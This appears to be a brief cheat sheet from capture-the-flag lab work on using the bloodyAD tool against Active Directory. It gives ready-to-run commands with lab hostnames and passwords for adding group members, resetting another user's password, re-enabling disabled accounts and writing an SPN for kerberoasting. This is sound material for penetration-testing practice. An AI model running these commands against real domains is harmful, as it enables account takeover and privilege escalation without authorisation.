bloodyAD

bloodyAD is an Active Directory privilege escalation Swiss army knife. https://github.com/CravateRouge/bloodyAD.

https://seriotonctf.github.io/BloodyAD-Cheatsheet/index.html

Add/Remove groupMember

bloodyAD -d "fluffy.htb" -u p.agila -p "prometheusx-303" --dc-ip 10.10.11.69 add groupMember 'service accounts' p.agila

Set/Reset Password

bloodyAD --host puppy.htb -d puppy.htb -u 'ant.edwards' -p 'Antman2025!' set password 'adam.silver' 'Password!'

UAC (User Access Control) (Modify - set/remove)

bloodyAD --host puppy.htb -d puppy.htb -u 'ant.edwards' -p 'Antman2025!' remove uac -f ACCOUNTDISABLE 'adam.silver'

SPN (Service Principal Name)

We modify the SPN if we have WriteSPN privilege so we can perform kerberoasting attack, get the hash and hopefully crack the password.

bloodyAD -d voleur.htb -u svc_ldap -p 'M1XyC9pW7qT5Vn' --kerberos --host dc.voleur.htb set object svc_winrm servicePrincipalName -v "http/newnameagainagain"